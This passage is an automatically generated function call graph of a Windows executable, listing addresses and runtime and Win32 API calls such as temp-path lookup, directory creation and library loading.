__scrt_get_show_window_mode 16854->16864 16855->16850 16855->16854 16858 7ff78f4954c4 _get_daylight 11 API calls 16855->16858 16856 7ff78f4a57b2 16863 7ff78f4a5938 16856->16863 16870 7ff78f4a4280 37 API calls 16856->16870 16872 7ff78f4a59ac memcpy_s 37 API calls 16856->16872 16857->16851 16859 7ff78f4a4dd0 16858->16859 16861 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 16859->16861 16860->16856 16865 7ff78f4a59ac memcpy_s 37 API calls 16860->16865 16861->16854 16862->16853 16868 7ff78f4954c4 11 API calls _get_daylight 16862->16868 16869 7ff78f49aea4 37 API calls _invalid_parameter_noinfo 16862->16869 16866 7ff78f4a867c 37 API calls 16863->16866 16864->16851 16864->16853 16867 7ff78f4954c4 11 API calls _get_daylight 16864->16867 16871 7ff78f49aea4 37 API calls _invalid_parameter_noinfo 16864->16871 16865->16856 16866->16847 16867->16864 16868->16862 16869->16862 16870->16856 16871->16864 16872->16856 16874 7ff78f4a4183 16873->16874 16875 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16874->16875 16876 7ff78f4a41ae memcpy_s 16874->16876 16875->16876 16876->16799 16878 7ff78f49e798 memcpy_s 16877->16878 16879 7ff78f494900 45 API calls 16878->16879 16880 7ff78f49e852 memcpy_s __scrt_get_show_window_mode 16878->16880 16879->16880 16880->16804 16882 7ff78f49e4eb 16881->16882 16885 7ff78f49e538 memcpy_s 16881->16885 16883 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16882->16883 16884 7ff78f49e517 16883->16884 16884->16804 16886 7ff78f49e5a3 16885->16886 16888 7ff78f494900 45 API calls 16885->16888 16887 7ff78f49aa3c __std_exception_copy 37 API calls 16886->16887 16891 7ff78f49e5e5 memcpy_s 16887->16891 16888->16886 16889 7ff78f49aec4 _wfindfirst32i64 17 API calls 16890 7ff78f49e690 16889->16890 16891->16889 16893 7ff78f490e81 16892->16893 16894 7ff78f490e93 16892->16894 16895 7ff78f4954c4 _get_daylight 11 API calls 16893->16895 16897 7ff78f490ea0 16894->16897 16900 7ff78f490edd 16894->16900 16896 7ff78f490e86 16895->16896 16898 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 16896->16898 16899 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 16897->16899 16906 7ff78f490e91 16898->16906 16899->16906 16901 7ff78f490f86 16900->16901 16902 7ff78f4954c4 _get_daylight 11 API calls 16900->16902 16903 7ff78f4954c4 _get_daylight 11 API calls 16901->16903 16901->16906 16904 7ff78f490f7b 16902->16904 16905 7ff78f491030 16903->16905 16907 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 16904->16907 16908 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 16905->16908 16906->16647 16907->16901 16908->16906 16910 7ff78f49df91 16909->16910 16911 7ff78f49493f 16909->16911 16910->16911 16912 7ff78f4a3974 45 API calls 16910->16912 16913 7ff78f49dfe4 16911->16913 16912->16911 16914 7ff78f49494f 16913->16914 16915 7ff78f49dffd 16913->16915 16914->16647 16915->16914 16916 7ff78f4a2cc0 45 API calls 16915->16916 16916->16914 16924 7ff78f49536c EnterCriticalSection 16917->16924 16926 7ff78f4828ac 16925->16926 16927 7ff78f494ac4 49 API calls 16926->16927 16928 7ff78f4828fd 16927->16928 16929 7ff78f4954c4 _get_daylight 11 API calls 16928->16929 16930 7ff78f482902 16929->16930 16944 7ff78f4954e4 16930->16944 16933 7ff78f481ef0 49 API calls 16934 7ff78f482931 __scrt_get_show_window_mode 16933->16934 16935 7ff78f488ae0 57 API calls 16934->16935 16936 7ff78f482966 16935->16936 16937 7ff78f48296b 16936->16937 16938 7ff78f4829a3 MessageBoxA 16936->16938 16939 7ff78f488ae0 57 API calls 16937->16939 16940 7ff78f4829bd 16938->16940 16941 7ff78f482985 MessageBoxW 16939->16941 16942 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16940->16942 16941->16940 16943 7ff78f4829cd 16942->16943 16943->16333 16945 7ff78f49b888 _get_daylight 11 API calls 16944->16945 16946 7ff78f4954fb 16945->16946 16947 7ff78f482909 16946->16947 16948 7ff78f49f158 _get_daylight 11 API calls 16946->16948 16951 7ff78f49553b 16946->16951 16947->16933 16949 7ff78f495530 16948->16949 16950 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16949->16950 16950->16951 16951->16947 16956 7ff78f49f828 16951->16956 16954 7ff78f49aec4 _wfindfirst32i64 17 API calls 16955 7ff78f495580 16954->16955 16960 7ff78f49f845 16956->16960 16957 7ff78f49f84a 16958 7ff78f495561 16957->16958 16959 7ff78f4954c4 _get_daylight 11 API calls 16957->16959 16958->16947 16958->16954 16964 7ff78f49f854 16959->16964 16960->16957 16960->16958 16962 7ff78f49f894 16960->16962 16961 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 16961->16958 16962->16958 16963 7ff78f4954c4 _get_daylight 11 API calls 16962->16963 16963->16964 16964->16961 16966 7ff78f488c82 WideCharToMultiByte 16965->16966 16967 7ff78f488c14 WideCharToMultiByte 16965->16967 16970 7ff78f488caf 16966->16970 16971 7ff78f483f25 16966->16971 16968 7ff78f488c55 16967->16968 16969 7ff78f488c3e 16967->16969 16968->16966 16974 7ff78f488c6b 16968->16974 16972 7ff78f4829e0 57 API calls 16969->16972 16973 7ff78f4829e0 57 API calls 16970->16973 16971->16342 16971->16344 16972->16971 16973->16971 16975 7ff78f4829e0 57 API calls 16974->16975 16975->16971 16977 7ff78f487bde 16976->16977 16978 7ff78f49a9b3 16976->16978 16977->16360 16978->16977 16979 7ff78f49aa3c __std_exception_copy 37 API calls 16978->16979 16980 7ff78f49a9e0 16979->16980 16980->16977 16981 7ff78f49aec4 _wfindfirst32i64 17 API calls 16980->16981 16982 7ff78f49aa10 16981->16982 16984 7ff78f483fd0 116 API calls 16983->16984 16985 7ff78f481ad6 16984->16985 16986 7ff78f481c84 16985->16986 16988 7ff78f4882b0 83 API calls 16985->16988 16987 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16986->16987 16989 7ff78f481c98 16987->16989 16990 7ff78f481b0e 16988->16990 16989->16370 17016 7ff78f483e40 16989->17016 17014 7ff78f481b3f 16990->17014 17022 7ff78f490814 16990->17022 16992 7ff78f49018c 74 API calls 16992->16986 16993 7ff78f481b28 16994 7ff78f481b2c 16993->16994 16995 7ff78f481b44 16993->16995 16996 7ff78f482890 59 API calls 16994->16996 17026 7ff78f4904dc 16995->17026 16996->17014 16999 7ff78f481b77 17002 7ff78f490814 73 API calls 16999->17002 17000 7ff78f481b5f 17001 7ff78f482890 59 API calls 17000->17001 17001->17014 17003 7ff78f481bc4 17002->17003 17004 7ff78f481bee 17003->17004 17005 7ff78f481bd6 17003->17005 17007 7ff78f4904dc _fread_nolock 53 API calls 17004->17007 17006 7ff78f482890 59 API calls 17005->17006 17006->17014 17008 7ff78f481c03 17007->17008 17009 7ff78f481c1e 17008->17009 17010 7ff78f481c09 17008->17010 17029 7ff78f490250 17009->17029 17011 7ff78f482890 59 API calls 17010->17011 17011->17014 17014->16992 17015 7ff78f482b30 59 API calls 17015->17014 17017 7ff78f481ef0 49 API calls 17016->17017 17018 7ff78f483e5d 17017->17018 17018->16380 17020 7ff78f481ef0 49 API calls 17019->17020 17021 7ff78f484080 17020->17021 17021->16370 17023 7ff78f490844 17022->17023 17035 7ff78f4905a4 17023->17035 17025 7ff78f49085d 17025->16993 17047 7ff78f4904fc 17026->17047 17030 7ff78f490259 17029->17030 17031 7ff78f481c32 17029->17031 17032 7ff78f4954c4 _get_daylight 11 API calls 17030->17032 17031->17014 17031->17015 17036 7ff78f49060e 17035->17036 17037 7ff78f4905ce 17035->17037 17036->17037 17039 7ff78f49061a 17036->17039 17038 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 17037->17038 17041 7ff78f4905f5 17038->17041 17046 7ff78f49536c EnterCriticalSection 17039->17046 17041->17025 17048 7ff78f481b59 17047->17048 17049 7ff78f490526 17047->17049 17048->16999 17048->17000 17049->17048 17050 7ff78f490572 17049->17050 17051 7ff78f490535 __scrt_get_show_window_mode 17049->17051 17060 7ff78f49536c EnterCriticalSection 17050->17060 17054 7ff78f4954c4 _get_daylight 11 API calls 17051->17054 17056 7ff78f49054a 17054->17056 17058 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 17056->17058 17058->17048 17062 7ff78f487966 17061->17062 17063 7ff78f4879dd GetTempPathW 17062->17063 17064 7ff78f48798a 17062->17064 17066 7ff78f4879f2 17063->17066 17065 7ff78f487b60 61 API calls 17064->17065 17067 7ff78f487996 17065->17067 17100 7ff78f482830 17066->17100 17124 7ff78f487420 17067->17124 17073 7ff78f48bcc0 _wfindfirst32i64 8 API calls 17075 7ff78f48154f 17073->17075 17074 7ff78f4879bc __std_exception_destroy 17074->17063 17079 7ff78f4879ca 17074->17079 17075->16389 17075->16390 17077 7ff78f487a0b __std_exception_destroy 17078 7ff78f487ab6 17077->17078 17083 7ff78f487a41 17077->17083 17104 7ff78f498aa4 17077->17104 17107 7ff78f488950 17077->17107 17081 7ff78f488bf0 59 API calls 17078->17081 17084 7ff78f487ac7 __std_exception_destroy 17081->17084 17085 7ff78f488ae0 57 API calls 17083->17085 17095 7ff78f487a7a __std_exception_destroy 17083->17095 17086 7ff78f488ae0 57 API calls 17084->17086 17084->17095 17087 7ff78f487a57 17085->17087 17088 7ff78f487ae5 17086->17088 17089 7ff78f487a5c 17087->17089 17090 7ff78f487a99 SetEnvironmentVariableW 17087->17090 17091 7ff78f487b1d SetEnvironmentVariableW 17088->17091 17092 7ff78f487aea 17088->17092 17093 7ff78f488ae0 57 API calls 17089->17093 17090->17095 17091->17095 17094 7ff78f488ae0 57 API calls 17092->17094 17096 7ff78f487a6c 17093->17096 17098 7ff78f487afa 17094->17098 17095->17073 17097 7ff78f497dec 38 API calls 17096->17097 17097->17095 17099 7ff78f497dec 38 API calls 17098->17099 17099->17095 17101 7ff78f482855 17100->17101 17158 7ff78f494d18 17101->17158 17349 7ff78f4986d0 17104->17349 17108 7ff78f48bc60 17107->17108 17109 7ff78f488960 GetCurrentProcess OpenProcessToken 17108->17109 17110 7ff78f4889ab GetTokenInformation 17109->17110 17112 7ff78f488a21 __std_exception_destroy 17109->17112 17111 7ff78f4889cd GetLastError 17110->17111 17113 7ff78f4889d8 17110->17113 17111->17112 17111->17113 17114 7ff78f488a34 CloseHandle 17112->17114 17115 7ff78f488a3a 17112->17115 17113->17112 17116 7ff78f4889ee GetTokenInformation 17113->17116 17114->17115 17475 7ff78f488650 17115->17475 17116->17112 17118 7ff78f488a14 ConvertSidToStringSidW 17116->17118 17118->17112 17125 7ff78f48742c 17124->17125 17126 7ff78f488ae0 57 API calls 17125->17126 17127 7ff78f48744e 17126->17127 17128 7ff78f487469 ExpandEnvironmentStringsW 17127->17128 17129 7ff78f487456 17127->17129 17131 7ff78f48748f __std_exception_destroy 17128->17131 17130 7ff78f482b30 59 API calls 17129->17130 17136 7ff78f487462 17130->17136 17132 7ff78f4874a6 17131->17132 17133 7ff78f487493 17131->17133 17138 7ff78f4874b4 17132->17138 17139 7ff78f4874c0 17132->17139 17134 7ff78f482b30 59 API calls 17133->17134 17134->17136 17135 7ff78f48bcc0 _wfindfirst32i64 8 API calls 17137 7ff78f487588 17135->17137 17136->17135 17137->17095 17148 7ff78f497dec 17137->17148 17479 7ff78f4979a4 17138->17479 17486 7ff78f496328 17139->17486 17142 7ff78f4874be 17143 7ff78f4874da 17142->17143 17146 7ff78f4874ed __scrt_get_show_window_mode 17142->17146 17144 7ff78f482b30 59 API calls 17143->17144 17144->17136 17145 7ff78f487562 CreateDirectoryW 17145->17136 17146->17145 17147 7ff78f48753c CreateDirectoryW 17146->17147 17147->17146 17149 7ff78f497df9 17148->17149 17150 7ff78f497e0c 17148->17150 17151 7ff78f4954c4 _get_daylight 11 API calls 17149->17151 17578 7ff78f497a70 17150->17578 17153 7ff78f497dfe 17151->17153 17155 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 17153->17155 17156 7ff78f497e0a 17155->17156 17156->17074 17160 7ff78f494d72 17158->17160 17159 7ff78f494d97 17161 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 17159->17161 17160->17159 17162 7ff78f494dd3 17160->17162 17175 7ff78f494dc1 17161->17175 17176 7ff78f4930d0 17162->17176 17165 7ff78f48bcc0 _wfindfirst32i64 8 API calls 17167 7ff78f482874 17165->17167 17166 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17166->17175 17167->17077 17168 7ff78f494eb4 17168->17166 17169 7ff78f494e89 17172 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17169->17172 17170 7ff78f494eda 17170->17168 17171 7ff78f494ee4 17170->17171 17174 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17171->17174 17172->17175 17173 7ff78f494e80 17173->17168 17173->17169 17174->17175 17175->17165 17177 7ff78f49310e 17176->17177 17182 7ff78f4930fe 17176->17182 17178 7ff78f493117 17177->17178 17183 7ff78f493145 17177->17183 17180 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 17178->17180 17179 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 17181 7ff78f49313d 17179->17181 17180->17181 17181->17168 17181->17169 17181->17170 17181->17173 17182->17179 17183->17181 17183->17182 17187 7ff78f493ae4 17183->17187 17220 7ff78f493530 17183->17220 17257 7ff78f492cc0 17183->17257 17188 7ff78f493b26 17187->17188 17189 7ff78f493b97 17187->17189 17190 7ff78f493bc1 17188->17190 17191 7ff78f493b2c 17188->17191 17192 7ff78f493bf0 17189->17192 17193 7ff78f493b9c 17189->17193 17276 7ff78f491e94 17190->17276 17194 7ff78f493b60 17191->17194 17195 7ff78f493b31 17191->17195 17198 7ff78f493c07 17192->17198 17199 7ff78f493bfa 17192->17199 17203 7ff78f493bff 17192->17203 17196 7ff78f493bd1 17193->17196 17197 7ff78f493b9e 17193->17197 17201 7ff78f493b37 17194->17201 17194->17203 17195->17198 17195->17201 17283 7ff78f491a84 17196->17283 17206 7ff78f493bad 17197->17206 17212 7ff78f493b40 17197->17212 17290 7ff78f4947ec 17198->17290 17199->17190 17199->17203 17207 7ff78f493b72 17201->17207 17201->17212 17215 7ff78f493b5b 17201->17215 17218 7ff78f493c30 17203->17218 17294 7ff78f4922a4 17203->17294 17206->17190 17210 7ff78f493bb2 17206->17210 17207->17218 17270 7ff78f4945d4 17207->17270 17213 7ff78f494698 37 API calls 17210->17213 17210->17218 17211 7ff78f48bcc0 _wfindfirst32i64 8 API calls 17214 7ff78f493f2a 17211->17214 17212->17218 17260 7ff78f494298 17212->17260 17213->17215 17214->17183 17216 7ff78f494900 45 API calls 17215->17216 17215->17218 17219 7ff78f493e1c 17215->17219 17216->17219 17218->17211 17219->17218 17301 7ff78f49efc8 17219->17301 17221 7ff78f493554 17220->17221 17222 7ff78f49353e 17220->17222 17223 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 17221->17223 17226 7ff78f493594 17221->17226 17224 7ff78f493b26 17222->17224 17225 7ff78f493b97 17222->17225 17222->17226 17223->17226 17227 7ff78f493bc1 17224->17227 17228 7ff78f493b2c 17224->17228 17229 7ff78f493bf0 17225->17229 17230 7ff78f493b9c 17225->17230 17226->17183 17238 7ff78f491e94 38 API calls 17227->17238 17231 7ff78f493b60 17228->17231 17232 7ff78f493b31 17228->17232 17236 7ff78f493c07 17229->17236 17237 7ff78f493bfa 17229->17237 17241 7ff78f493bff 17229->17241 17233 7ff78f493bd1 17230->17233 17234 7ff78f493b9e 17230->17234 17239 7ff78f493b37 17231->17239 17231->17241 17232->17236 17232->17239 17243 7ff78f491a84 38 API calls 17233->17243 17235 7ff78f493b40 17234->17235 17246 7ff78f493bad 17234->17246 17240 7ff78f494298 47 API calls 17235->17240 17256 7ff78f493c30 17235->17256 17242 7ff78f4947ec 45 API calls 17236->17242 17237->17227 17237->17241 17252 7ff78f493b5b 17238->17252 17239->17235 17244 7ff78f493b72 17239->17244 17239->17252 17240->17252 17245 7ff78f4922a4 38 API calls 17241->17245 17241->17256 17242->17252 17243->17252 17247 7ff78f4945d4 46 API calls 17244->17247 17244->17256 17245->17252 17246->17227 17248 7ff78f493bb2 17246->17248 17247->17252 17250 7ff78f494698 37 API calls 17248->17250 17248->17256 17249 7ff78f48bcc0 _wfindfirst32i64 8 API calls 17251 7ff78f493f2a 17249->17251 17250->17252 17251->17183 17253 7ff78f493e1c 17252->17253 17254 7ff78f494900 45 API calls 17252->17254 17252->17256 17255 7ff78f49efc8 46 API calls 17253->17255 17253->17256 17254->17253 17255->17253 17256->17249 17332 7ff78f491108 17257->17332 17261 7ff78f4942be 17260->17261 17262 7ff78f490cc0 12 API calls 17261->17262 17263 7ff78f49430e 17262->17263 17264 7ff78f49eb30 46 API calls 17263->17264 17271 7ff78f494609 17270->17271 17272 7ff78f494627 17271->17272 17273 7ff78f494900 45 API calls 17271->17273 17275 7ff78f49464e 17271->17275 17274 7ff78f49efc8 46 API calls 17272->17274 17273->17272 17274->17275 17275->17215 17278 7ff78f491ec7 17276->17278 17277 7ff78f491ef6 17282 7ff78f491f33 17277->17282 17313 7ff78f490d68 17277->17313 17278->17277 17280 7ff78f491fb3 17278->17280 17281 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 17280->17281 17281->17282 17282->17215 17284 7ff78f491ab7 17283->17284 17285 7ff78f491ae6 17284->17285 17288 7ff78f491ba3 17284->17288 17286 7ff78f491b23 17285->17286 17287 7ff78f490d68 12 API calls 17285->17287 17286->17215 17287->17286 17289 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 17288->17289 17289->17286 17291 7ff78f49482f 17290->17291 17293 7ff78f494833 __crtLCMapStringW 17291->17293 17321 7ff78f494888 17291->17321 17293->17215 17295 7ff78f4922d7 17294->17295 17296 7ff78f492306 17295->17296 17298 7ff78f4923c3 17295->17298 17297 7ff78f490d68 12 API calls 17296->17297 17300 7ff78f492343 17296->17300 17297->17300 17299 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 17298->17299 17299->17300 17300->17215 17302 7ff78f49eff9 17301->17302 17311 7ff78f49f007 17301->17311 17303 7ff78f49f027 17302->17303 17304 7ff78f494900 45 API calls 17302->17304 17302->17311 17305 7ff78f49f05f 17303->17305 17306 7ff78f49f038 17303->17306 17304->17303 17305->17311 17311->17219 17314 7ff78f490d8e 17313->17314 17315 7ff78f490d9f 17313->17315 17314->17282 17315->17314 17316 7ff78f49dbbc _fread_nolock 12 API calls 17315->17316 17317 7ff78f490dd0 17316->17317 17322 7ff78f4948a6 17321->17322 17323 7ff78f4948ae 17321->17323 17324 7ff78f494900 45 API calls 17322->17324 17323->17293 17324->17323 17333 7ff78f49114f 17332->17333 17334 7ff78f49113d 17332->17334 17337 7ff78f49115d 17333->17337 17342 7ff78f491199 17333->17342 17335 7ff78f4954c4 _get_daylight 11 API calls 17334->17335 17336 7ff78f491142 17335->17336 17338 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 17336->17338 17339 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 17337->17339 17340 7ff78f49114d 17338->17340 17339->17340 17340->17183 17341 7ff78f491515 17341->17340 17343 7ff78f4954c4 _get_daylight 11 API calls 17341->17343 17342->17341 17344 7ff78f4954c4 _get_daylight 11 API calls 17342->17344 17345 7ff78f4917a9 17343->17345 17346 7ff78f49150a 17344->17346 17347 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 17345->17347 17348 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 17346->17348 17347->17340 17348->17341 17390 7ff78f4a1bc8 17349->17390 17449 7ff78f4a1940 17390->17449 17470 7ff78f4a0cb8 EnterCriticalSection 17449->17470 17476 7ff78f488675 17475->17476 17477 7ff78f494d18 48 API calls 17476->17477 17478 7ff78f488698 LocalFree ConvertStringSecurityDescriptorToSecurityDescriptorW 17477->17478 17480 7ff78f4979c2 17479->17480 17483 7ff78f4979f5 17479->17483 17481 7ff78f4a0e54 _wfindfirst32i64 37 API calls 17480->17481 17480->17483 17482 7ff78f4979f1 17481->17482 17482->17483 17484 7ff78f49aec4 _wfindfirst32i64 17 API calls 17482->17484 17483->17142 17485 7ff78f497a25 17484->17485 17487 7ff78f4963b2 17486->17487 17488 7ff78f496344 17486->17488 17523 7ff78f4a04a0 17487->17523 17488->17487 17489 7ff78f496349 17488->17489 17491 7ff78f496361 17489->17491 17492 7ff78f49637e 17489->17492 17498 7ff78f4960f8 GetFullPathNameW 17491->17498 17506 7ff78f49616c GetFullPathNameW 17492->17506 17497 7ff78f496376 __std_exception_destroy 17497->17142 17499 7ff78f49611e GetLastError 17498->17499 17500 7ff78f496134 17498->17500 17502 7ff78f495438 _fread_nolock 11 API calls 17499->17502 17501 7ff78f496130 17500->17501 17505 7ff78f4954c4 _get_daylight 11 API calls 17500->17505 17501->17497 17503 7ff78f49612b 17502->17503 17504 7ff78f4954c4 _get_daylight 11 API calls 17503->17504 17504->17501 17505->17501 17507 7ff78f49619f GetLastError 17506->17507 17509 7ff78f4961b5 __std_exception_destroy 17506->17509 17508 7ff78f495438 _fread_nolock 11 API calls 17507->17508 17510 7ff78f4961ac 17508->17510 17511 7ff78f4961b1 17509->17511 17513 7ff78f49620f GetFullPathNameW 17509->17513 17512 7ff78f4954c4 _get_daylight 11 API calls 17510->17512 17514 7ff78f496244 17511->17514 17512->17511 17513->17507 17513->17511 17517 7ff78f4962b8 memcpy_s 17514->17517 17518 7ff78f49626d __scrt_get_show_window_mode 17514->17518 17517->17497 17518->17517 17526 7ff78f4a02b0 17523->17526 17527 7ff78f4a02f2 17526->17527 17528 7ff78f4a02db 17526->17528 17529 7ff78f4a02f6 17527->17529 17530 7ff78f4a0317 17527->17530 17531 7ff78f4954c4 _get_daylight 11 API calls 17528->17531 17552 7ff78f4a041c 17529->17552 17564 7ff78f49f918 17530->17564 17547 7ff78f4a02e0 17531->17547 17536 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 17551 7ff78f4a02eb __std_exception_destroy 17536->17551 17543 7ff78f48bcc0 _wfindfirst32i64 8 API calls 17547->17536 17551->17543 17553 7ff78f4a0466 17552->17553 17554 7ff78f4a0436 17552->17554 17555 7ff78f4a0471 GetDriveTypeW 17553->17555 17556 7ff78f4a0451 17553->17556 17557 7ff78f4954a4 _fread_nolock 11 API calls 17554->17557 17555->17556 17560 7ff78f48bcc0 _wfindfirst32i64 8 API calls 17556->17560 17558 7ff78f4a043b 17557->17558 17565 7ff78f48d0e0 __scrt_get_show_window_mode 17564->17565 17566 7ff78f49f94e GetCurrentDirectoryW 17565->17566 17567 7ff78f49f98c 17566->17567 17569 7ff78f49f965 17566->17569 17585 7ff78f4a0cb8 EnterCriticalSection 17578->17585 17587 7ff78f48173e 17586->17587 17588 7ff78f481726 17586->17588 17590 7ff78f481768 17587->17590 17591 7ff78f481744 17587->17591 17589 7ff78f482b30 59 API calls 17588->17589 17592 7ff78f481732 17589->17592 17679 7ff78f487c10 17590->17679 17716 7ff78f4812b0 17591->17716 17592->16413 17597 7ff78f48178d 17600 7ff78f482890 59 API calls 17597->17600 17598 7ff78f4817b9 17601 7ff78f483fd0 116 API calls 17598->17601 17599 7ff78f48175f 17599->16413 17603 7ff78f4817a3 17600->17603 17604 7ff78f4817ce 17601->17604 17602 7ff78f482b30 59 API calls 17602->17599 17603->16413 17605 7ff78f4817ee 17604->17605 17606 7ff78f4817d6 17604->17606 17608 7ff78f490814 73 API calls 17605->17608 17607 7ff78f482b30 59 API calls 17606->17607 17609 7ff78f4817e5 17607->17609 17610 7ff78f4817ff 17608->17610 17629 7ff78f482d86 17628->17629 17630 7ff78f481ef0 49 API calls 17629->17630 17631 7ff78f482db9 17630->17631 17632 7ff78f483e40 49 API calls 17631->17632 17678 7ff78f4830ea 17631->17678 17633 7ff78f482e27 17632->17633 17634 7ff78f483e40 49 API calls 17633->17634 17635 7ff78f482e38 17634->17635 17636 7ff78f482e59 17635->17636 17637 7ff78f482e95 17635->17637 17851 7ff78f4831b0 17636->17851 17639 7ff78f4831b0 75 API calls 17637->17639 17640 7ff78f482e93 17639->17640 17641 7ff78f482f16 17640->17641 17642 7ff78f482ed4 17640->17642 17644 7ff78f4831b0 75 API calls 17641->17644 17859 7ff78f4875a0 17642->17859 17646 7ff78f482f40 17644->17646 17650 7ff78f4831b0 75 API calls 17646->17650 17656 7ff78f482fdc 17646->17656 17680 7ff78f487c20 17679->17680 17681 7ff78f481ef0 49 API calls 17680->17681 17682 7ff78f487c61 17681->17682 17683 7ff78f487ce1 17682->17683 17759 7ff78f483f60 17682->17759 17685 7ff78f48bcc0 _wfindfirst32i64 8 API calls 17683->17685 17687 7ff78f481785 17685->17687 17687->17597 17687->17598 17688 7ff78f487d1b 17765 7ff78f4877c0 17688->17765 17690 7ff78f487d04 17695 7ff78f482c50 59 API calls 17690->17695 17691 7ff78f487cd0 17779 7ff78f482c50 17691->17779 17692 7ff78f487b60 61 API calls 17696 7ff78f487c92 __std_exception_destroy 17692->17696 17695->17688 17696->17690 17696->17691 17717 7ff78f4812c2 17716->17717 17718 7ff78f483fd0 116 API calls 17717->17718 17719 7ff78f4812f2 17718->17719 17720 7ff78f4812fa 17719->17720 17721 7ff78f481311 17719->17721 17722 7ff78f482b30 59 API calls 17720->17722 17723 7ff78f490814 73 API calls 17721->17723 17729 7ff78f48130a __std_exception_destroy 17722->17729 17724 7ff78f481323 17723->17724 17725 7ff78f48134d 17724->17725 17726 7ff78f481327 17724->17726 17732 7ff78f481368 17725->17732 17733 7ff78f481390 17725->17733 17727 7ff78f482890 59 API calls 17726->17727 17728 7ff78f48133e 17727->17728 17731 7ff78f49018c 74 API calls 17728->17731 17730 7ff78f48bcc0 _wfindfirst32i64 8 API calls 17729->17730 17734 7ff78f481454 17730->17734 17731->17729 17735 7ff78f482890 59 API calls 17732->17735 17736 7ff78f4813aa 17733->17736 17746 7ff78f481463 17733->17746 17734->17599 17734->17602 17738 7ff78f481383 17735->17738 17739 7ff78f481050 98 API calls 17736->17739 17737 7ff78f4813c3 17740 7ff78f49018c 74 API calls 17737->17740 17741 7ff78f49018c 74 API calls 17738->17741 17742 7ff78f4813bb 17739->17742 17743 7ff78f4813cf 17740->17743 17741->17729 17742->17737 17749 7ff78f4814d2 __std_exception_destroy 17742->17749 17744 7ff78f4904dc _fread_nolock 53 API calls 17744->17746 17746->17737 17746->17744 17748 7ff78f4814bb 17746->17748 17750 7ff78f482890 59 API calls 17748->17750 17750->17749 17760 7ff78f483f6a 17759->17760 17761 7ff78f488ae0 57 API calls 17760->17761 17762 7ff78f483f92 17761->17762 17763 7ff78f48bcc0 _wfindfirst32i64 8 API calls 17762->17763 17764 7ff78f483fba 17763->17764 17764->17688 17764->17692 17764->17696 17852 7ff78f4831e4 17851->17852 17853 7ff78f494ac4 49 API calls 17852->17853 17854 7ff78f48320a 17853->17854 17855 7ff78f48321b 17854->17855 17911 7ff78f495dec 17854->17911 17857 7ff78f48bcc0 _wfindfirst32i64 8 API calls 17855->17857 17858 7ff78f483239 17857->17858 17858->17640 17860 7ff78f4875ae 17859->17860 17861 7ff78f483fd0 116 API calls 17860->17861 17862 7ff78f4875dd 17861->17862 17912 7ff78f495e15 17911->17912 17913 7ff78f495e09 17911->17913 18124 7ff78f4963dc 18123->18124 18125 7ff78f496402 18124->18125 18127 7ff78f496435 18124->18127 18126 7ff78f4954c4 _get_daylight 11 API calls 18125->18126 18128 7ff78f496407 18126->18128 18129 7ff78f496448 18127->18129 18130 7ff78f49643b 18127->18130 18131 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 18128->18131 18142 7ff78f49b1ec 18129->18142 18132 7ff78f4954c4 _get_daylight 11 API calls 18130->18132 18134 7ff78f484029 18131->18134 18132->18134 18134->16488 18155 7ff78f4a0cb8 EnterCriticalSection 18142->18155 18503 7ff78f4990a0 18502->18503 18506 7ff78f498b7c 18503->18506 18507 7ff78f498bc6 18506->18507 18508 7ff78f498b97 18506->18508 18516 7ff78f49536c EnterCriticalSection 18507->18516 18509 7ff78f49add8 _invalid_parameter_noinfo 37 API calls 18508->18509 18518 7ff78f48ffb1 18517->18518 18519 7ff78f48ff83 18517->18519 18529 7ff78f483fd0 116 API calls 18528->18529 18530 7ff78f4815c7 18529->18530 18531 7ff78f4815f0 18530->18531 18532 7ff78f4815cf 18530->18532 18534 7ff78f490814 73 API calls 18531->18534 18533 7ff78f482b30 59 API calls 18532->18533 18535 7ff78f4815df 18533->18535 18536 7ff78f481601 18534->18536 18535->16507 18537 7ff78f481605 18536->18537 18538 7ff78f481621 18536->18538 18539 7ff78f482890 59 API calls 18537->18539 18540 7ff78f481651 18538->18540 18541 7ff78f481631 18538->18541 18550 7ff78f48161c __std_exception_destroy 18539->18550 18543 7ff78f481666 18540->18543 18548 7ff78f48167d 18540->18548 18542 7ff78f482890 59 API calls 18541->18542 18542->18550 18545 7ff78f481050 98 API calls 18543->18545 18544 7ff78f49018c 74 API calls 18546 7ff78f4816f7 18544->18546 18545->18550 18546->16507 18547 7ff78f4904dc _fread_nolock 53 API calls 18547->18548 18548->18547 18549 7ff78f4816be 18548->18549 18548->18550 18551 7ff78f482890 59 API calls 18549->18551 18550->18544 18551->18550 18554 7ff78f48196f 18552->18554 18555 7ff78f4819d3 18552->18555 18553 7ff78f495070 45 API calls 18553->18554 18554->18553 18554->18555 18555->16517 18557 7ff78f488ae0 57 API calls 18556->18557 18558 7ff78f488277 LoadLibraryExW 18557->18558 18559 7ff78f488294 __std_exception_destroy 18558->18559 18559->16534 18620 7ff78f485bd0 18619->18620 18621 7ff78f481ef0 49 API calls 18620->18621 18622 